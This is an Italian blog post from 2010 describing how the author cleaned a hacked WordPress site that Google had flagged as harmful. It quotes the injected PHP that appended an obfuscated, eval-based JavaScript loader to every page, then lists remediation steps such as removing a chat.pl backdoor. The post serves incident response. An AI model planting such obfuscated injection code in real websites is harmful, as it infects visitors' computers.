Voglia di Linux

avventure e soddisfazioni usando software libero

Se Google segnala che il sito è infetto

closeQuesto articolo è stato pubblicato 10 anni 6 mesi 29 giorni giorni fa quindi alcuni contenuti o informazioni presenti in esso potrebbero non essere più validi. Questo sito non è responsabile per eventuali errori causati da questo problema.

All’ apertura del sito appare:

Attenzione: l’apertura di questo sito potrebbe danneggiare il tuo computer!

e nei risultati d ricerca:

www.sito.com
Questo sito potrebbe arrecare danni al tuo computer.

L’infezione aggiungeva uno script in fondo a tutte la pagine. In index.php e altri file si trovava il codice che conteneva:

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t(){return z($a);}var $a="Z73tZ3dZ22Z2573tZ253dZ2522Z2524Z2561Z253dstZ253bdZ2563Z2573Z2528Z2564Z2561+
Z2564Z2562Z252bdZ2563+Z2564Z2564+Z2564eZ252cZ2531Z2530Z2529;Z2564Z ecc ecc
=0;eval(t());‘;}//important security update ?>

Se sono compromesse installazioni wordpress (nel mio caso):

  • Segnarsi la data di modifica di index.php e/o altri file infetti
  • cambiare passwd FTP e assicurarsi che sul proprio PC non siano presenti trojan che leggano il passwd di client come filezilla. Magari usare un cd live di ubuntu per pulire il sito, nel dubbio
  • reinstallare wordpress, joomla ecc, e nel caso che i file di wordpress si trovano in un altra directory del sito sostituire il file index.php, che nel caso che sia infetto pesa 6.5kb invece di 104b.
  • Controllare la data di modifica degli script in /cgi-bin e sostituirli con i backup nel caso che siano infetti. Nel caso mio erano infetti anche counter.cgi che viene chiamato da molte pagine.Controllare anche eventuali file *.htm che sono modificati, nel caso mio c’erano 3 o 4 infetti con uno javascript.
  • Controllare se è presente un script tipo “chat.pl”, nel caso mio era un backdoor per accedere al server senza passwd e eliminarlo
  • Controllare se nella root sia presente mailcheck.php e eliminarlo.

ste

02 aprile 2010



Leave a Reply

Continuando navigare nel sito accetti l'utilizzo dei cookie. maggiori informazioni

Questo sito o gli strumenti terzi da questo utilizzati si avvalgono di cookie necessari al funzionamento ed utili alle finalità illustrate nella pagina sulla privacy. Chiudendo questo banner, scorrendo questa pagina, cliccando su un link o proseguendo la navigazione in altra maniera, acconsenti all’uso dei cookie.

Chiudi